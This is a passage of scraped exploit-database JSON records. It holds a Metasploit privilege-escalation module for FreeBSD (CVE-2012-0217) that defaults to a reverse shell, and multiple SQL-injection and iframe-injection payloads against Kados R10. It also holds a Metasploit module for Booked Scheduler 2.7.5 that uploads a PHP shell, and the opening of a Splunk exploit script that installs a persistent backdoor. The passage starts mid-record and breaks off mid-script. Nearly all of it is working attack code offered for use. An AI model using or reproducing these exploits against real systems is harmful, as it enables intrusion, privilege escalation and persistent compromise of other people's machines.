"2019-03-07T00:00:00", "published": "2019-03-07T00:00:00", "id": "1337DAY-ID-32324", "href": "https://0day.today/exploit/description/32324", "title": "FreeBSD - Intel SYSRET Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32324"}, {"lastseen": "2019-03-09T04:35:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-07T00:00:00", "published": "2019-03-07T00:00:00", "id": "1337DAY-ID-32321", "href": "https://0day.today/exploit/description/32321", "title": "Kados R10 GreenBee - Multiple SQL Injection Vulnerability", "type": "zdt", "sourceData": "===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'menu_lev1' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a\r\nweb-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : menu_lev1\r\n# Attack Pattern :\r\n-1%27%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27\r\n# GET Method :\r\nhttp://localhost/kados_r10/kados/projects.php?menu_lev1=-1'+(SELECT 1 and\r\nROW(1,1)>(SELECT\r\nCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x\r\nFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'\r\n#\r\nhttp://localhost/kados_r10/kados/administration/languages.php?menu_lev1=%27[SQL\r\nInject Here]\r\n# http://localhost/kados_r10/kados/administration/news.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/administration/parameters.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/administration/profiles.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/administration/users.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/app_admin/app_columns.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/app_admin/external_connections.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/app_admin/template_tags.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/app_admin/template_tags_groups.php?menu_lev1=%27[SQL\r\nInject Here]\r\n#\r\nhttp://localhost/kados_r10/kados/app_admin/templates_project.php?menu_lev1=%27[SQL\r\nInject Here]\r\n# http://localhost/kados_r10/kados/my_profile.php?menu_lev1=%27[SQL Inject\r\nHere]\r\n# http://localhost/kados_r10/kados/my_profile_password.php?menu_lev1=%27[SQL\r\nInject Here]\r\n# http://localhost/kados_r10/kados/template_checklist.php?menu_lev1=%27[SQL\r\nInject Here]\r\n===========================================================================================\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'mng_profile_id' SQL Injection\r\n# Dork: N/A\r\n# Date: 06-03-2019\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : mng_profile_id \r\n# Attack Pattern : -1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) \r\n# GET Method : http://localhost/kados_r10/kados/administration/profiles.php?token=f6bd48af7b7230313ff1c00474381dcf&mng_profile_id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'id_to_modify' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : id_to_modify \r\n# Attack Pattern : -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27\r\n# GET Method : http://localhost/kados_r10/kados/administration/parameters.php?token=820c757c14e567fdef13d55877a19e39&action=modify&id_to_modify=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' \r\n# GET Method : http://localhost/kados_r10/kados/administration/news.php?token=a81c2106be9d9ef8cbc56622d87efac3&action=modify&id_to_modify=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'user2reset' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : user2reset \r\n# Attack Pattern : -1%27+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27 \r\n# GET Method : http://localhost/kados_r10/kados/administration/users.php?token=01855ea7701da0f7e2a100088ea9c6c9&action=reset_password&user2reset=-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'language_tag' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : language_tag \r\n# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27 \r\n# GET Method : http://localhost/kados_r10/kados/administration/languages.php?token=f581575657b2e6a2660689998dd8306b&action=change_language_status&language_tag='+((SELECT 1 FROM (SELECT SLEEP(25))A))+'&situation=3 \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'id_to_delete' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : id_to_delete \r\n# Attack Pattern : 2+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f \r\n# GET Method : http://localhost/kados_r10/kados/administration/news.php?token=fad12fb6be860d0f53ecb25d2a6e4334&action=delete&id_to_delete=2 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|\"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR\"*/ \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'sort_direction' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : sort_direction\r\n# Attack Pattern : -1+AND+((SELECT+1+FROM+(SELECT+2)a+WHERE+1%3dsleep(25)))--+1\r\n# GET Method : http://localhost/kados_r10/kados/app_admin/app_columns.php?token=82ef5f1ad5effa486a0ca1471cbb18b5&sort_direction=-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1&sort_criterion=column_tag\r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'id_project' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : id_project\r\n# Attack Pattern : 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f\r\n# GET Method : http://localhost/kados_r10/kados/projects.php?token=56d0e371e763236c86ae7d3ede6a0626&action=choose_color&color=beige&id_project=1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|\"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR\"*/ \r\n===========================================================================================\r\n\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'filter_user_mail' SQL Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - SQLi (Blind)\r\n# Parameters : filter_user_mail\r\n# Attack Pattern : 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f\r\n# POST Method : http://localhost/kados_r10/kados/administration/users.php?token=9ae24f061d88384406beabc3f8746c08 \r\n===========================================================================================\r\n\r\n===========================================================================================\r\n# Exploit Title: Kados R10 GreenBee - 'id_to_modify' Frame Injection\r\n# Dork: N/A\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage: https://www.kados.info/\r\n# Software Link: https://sourceforge.net/projects/kados/\r\n# Version: R10 GreenBee\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.\r\n===========================================================================================\r\n# POC - Frame Injection\r\n# Parameters : id_to_modify\r\n# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e\r\n# GET Method : http://localhost/kados_r10/kados/administration/news.php?token=6f64f03ffee440e873d80ce1e584e51b&action=modify&id_to_modify=<iframe src=\"http://cyber-warrior.org/?\"></iframe> \r\n===========================================================================================\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32321"}, {"lastseen": "2019-03-06T00:19:53", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-04T00:00:00", "published": "2019-03-04T00:00:00", "id": "1337DAY-ID-32299", "href": "https://0day.today/exploit/description/32299", "title": "Booked Scheduler 2.7.5 - Remote Command Execution Exploit", "type": "zdt", "sourceData": "## \r\n# This module requires Metasploit: http://metasploit.com/download \r\n# Current source: https://github.com/rapid7/metasploit-framework \r\n## \r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking \r\n \r\n include Msf::Exploit::Remote::HttpClient \r\n \r\n def initialize \r\n super( \r\n 'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution', \r\n 'Description' => %q{ \r\n This module exploits a file upload vulnerability Booked 2.7.5. \r\n In the \"Look and Feel\" section of the management panel, you can modify the Logo-Favico-CSS files. \r\n Upload sections has file extension control except favicon part.\r\n You can upload the file with the extension you want through the Favicon field.\r\n The file you upload is written to the main directory of the site under the name \"custom-favicon\". \r\n After upload the php payload to the main directory, Exploit executes payload and receives shell. \r\n }, \r\n 'Author' => [ \r\n 'AkkuS <\u00d6zkan Mustafa Akku\u015f>', # Vulnerability Discovery, PoC & Msf Module \r\n ], \r\n 'License' => MSF_LICENSE, \r\n 'References' => \r\n [\r\n ['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'], \r\n ], \r\n 'Platform' => ['php'], \r\n 'Arch' => ARCH_PHP, \r\n 'Targets' => \r\n [ \r\n ['Booked Scheduler v2.7.5', {}] \r\n ], \r\n 'DisclosureDate' => '01 March 2019', \r\n 'Privileged' => false, \r\n 'DefaultTarget' => 0 \r\n ) \r\n \r\n register_options( \r\n [ \r\n OptBool.new('SSL', [true, 'Use SSL', false]),\r\n OptString.new('TARGETURI', [true, 'The base path to Booked', '/']), \r\n OptString.new('USER', [true, 'User to login with', 'admin']), \r\n OptString.new('PASS', [true, 'Password to login with', 'admin']), \r\n ], self.class) \r\n end \r\n##\r\n# Check Exploit Vulnerable\r\n## \r\n def check\r\n res = send_request_cgi({ \r\n 'method' => 'GET', \r\n 'uri' => normalize_uri(target_uri, \"/Web/index.php\") \r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /v2.7.5/\r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n return res \r\n end \r\n##\r\n# Exploit Portion\r\n## \r\n def exploit \r\n res = send_request_cgi({ \r\n 'method' => 'POST', \r\n 'uri' => normalize_uri(target_uri, \"/Web/index.php\"), \r\n 'vars_post' => { \r\n \"email\" => datastore['USER'], \r\n \"password\" => datastore['PASS'],\r\n \"captcha\" => \"\",\r\n \"resume\" => \"\",\r\n \"language\" => \"en_us\",\r\n \"login\" => \"submit\" \r\n \r\n } \r\n })\r\n\r\n if res and res.code == 302\r\n print_status(\"Successful redirection to admin dashboard.\")\r\n else\r\n return res\r\n end\r\n \r\n get_cookie = res.get_cookies \r\n cookie = get_cookie \r\n##\r\n# Login Access Control\r\n##\r\n control = send_request_cgi({ \r\n 'method' => 'GET', \r\n 'cookie' => cookie, \r\n 'uri' => normalize_uri(target_uri, \"/Web/dashboard.php\") \r\n })\r\n\r\n html = control.body\r\n if html =~ /Dashboard/\r\n print_good(\"Login successfuly\")\r\n else\r\n print_status(\"User information is incorrect. Login failed\")\r\n exit 0\r\n end \r\n##\r\n# Reading CSRF Token\r\n##\r\n csrf = send_request_cgi({ \r\n 'method' => 'GET', \r\n 'cookie' => cookie, \r\n 'uri' => normalize_uri(target_uri, \"/Web/admin/manage_theme.php\") \r\n })\r\n\r\n html = control.body\r\n if html =~ /Look and Feel/\r\n token = csrf.body.split('CSRF_TOKEN\" value=')[1].split(\";\")[0].split('/')[0].split('\"')[1]\r\n print_status(\"CSRF Token = #{token}\")\r\n else\r\n print_status(\"User information is incorrect. Login failed\")\r\n exit 0\r\n end \r\n##\r\n# Loading phase of the vulnerable file\r\n##\r\n boundary = Rex::Text.rand_text_alphanumeric(29)\r\n\r\n data2 = \"-----------------------------{boundary}\"\r\n data2 << \"\\r\\nContent-Disposition: form-data; name=\\\"LOGO_FILE\\\"\\r\\n\\r\\n\\r\\n\"\r\n data2 << \"-----------------------------{boundary}\"\r\n data2 << \"\\r\\nContent-Disposition: form-data; name=\\\"FAVICON_FILE\\\"; filename=\\\"akkus.php\\\"\"\r\n data2 << \"\\r\\nContent-Type: text/html\\r\\n\\r\\n\"\r\n data2 << payload.encoded\r\n data2 << \"\\n\\r\\n-----------------------------{boundary}\"\r\n data2 << \"\\r\\nContent-Disposition: form-data; name=\\\"CSS_FILE\\\"\\r\\n\\r\\n\\r\\n\"\r\n data2 << \"-----------------------------{boundary}\"\r\n data2 << \"\\r\\nContent-Disposition: form-data; name=\\\"CSRF_TOKEN\\\"\\r\\n\\r\\n\"\r\n data2 << \"#{token}\"\r\n data2 << \"\\r\\n-----------------------------{boundary}--\\r\\n\"\r\n\r\n res = send_request_raw(\r\n {\r\n 'method' => \"POST\",\r\n 'uri' => normalize_uri(target_uri, \"/Web/admin/manage_theme.php?action=update\"),\r\n 'data' => data2,\r\n 'headers' =>\r\n {\r\n 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n if res and res.code == 200\r\n print_good \"Payload was successfully uploaded.\"\r\n else\r\n print_error \"Upload failed.\"\r\n return\r\n end \r\n##\r\n# Command execution and shell retrieval\r\n##\r\n print_status(\"Attempting to execute the payload...\")\r\n\r\n command = payload.encoded\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri, \"/Web/custom-favicon.php\"),\r\n 'cookie' => cookie\r\n }, 25)\r\n\r\n\r\n if res and res.code == 200\r\n print_good \"Payload executed successfully\"\r\n end \r\n end \r\nend\r\n##\r\n# End\r\n##\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32299"}, {"lastseen": "2019-03-06T00:22:39", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category web applications", "modified": "2019-03-04T00:00:00", "published": "2019-03-04T00:00:00", "id": "1337DAY-ID-32300", "href": "https://0day.today/exploit/description/32300", "title": "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Splunk Enterprise 7.2.4 Custom App RCE (persistent backdoor - custom binary payload)\r\n# Exploit Author: Matteo Malvica \r\n# Original Author: Lee Mazzoleni\r\n# Vendor Homepage: https://www.splunk.com/\r\n# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html\r\n# Version: 7.2.4\r\n# Tested on: kali 4.18.0-kali2-amd64\r\n# CVE : n/a\r\n\r\n# NOTES: Due to python interoperability issue on CentOS, I have upgraded the exploit to\r\n# support any kind of binary or payload so the exploit does not have to rely on any python libraries\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom time import sleep\r\nfrom sys import stdout,argv\r\nfrom os import getcwd,path,system\r\nfrom subprocess import Popen\r\nimport os\r\nimport stat\r\nimport binascii\r\n\r\n# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases\r\ngecko_driver_path = '/root/Desktop/geckodriver'\r\n\r\ndef checkLogin(url):\r\n\tif '/login' not in url and '/logout' not in url:\r\n\t\tprint 'Login successful!'\r\n\telse:\r\n\t\tprint 'Login failed! Aborting...'\r\n\t\texit()\r\n\r\n\r\ndef checkUrl(url):\r\n\tif '_upload' not in url:\r\n\t\tprint '[-] Navigation error, aborting...'\r\n\t\texit()\r\n\r\n\r\ndef exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass):\r\n\tprint '[+] Starting bot ...'\r\n\tprofile = webdriver.FirefoxProfile()\r\n\tprofile.accept_untrusted_certs = True\r\n\tdriver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)\r\n\r\n\tprint '[*] Loading the target page ...'\r\n\tdriver.get(splunk_target_url)\r\n\tsleep(1)\r\n\r\n\tstdout.write('[*] Attempting to log in with the provided credentials ... ')\r\n\tusername_field = driver.find_element_by_name(\"username\")\r\n\tusername_field.clear()\r\n\tusername_field.send_keys(splunk_admin_user)\r\n\tsleep(1)\r\n\r\n\tpw_field = driver.find_element_by_name(\"password\")\r\n\tpw_field.clear()\r\n\tpw_field.send_keys(splunk_admin_pass)\r\n\tpw_field.send_keys(Keys.RETURN)\r\n\tsleep(3)\r\n\r\n\tcurrent_url = driver.current_url\r\n\tcheckLogin(current_url)\r\n\r\n\turl = driver.current_url.split('/')\r\n\tupload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'\r\n\tprint '[*] Navigating to the uploads page ({}) ...'.format(upload_url)\r\n\tdriver.get(upload_url)\r\n\tsleep(1)\r\n\r\n\tcurrent_url = 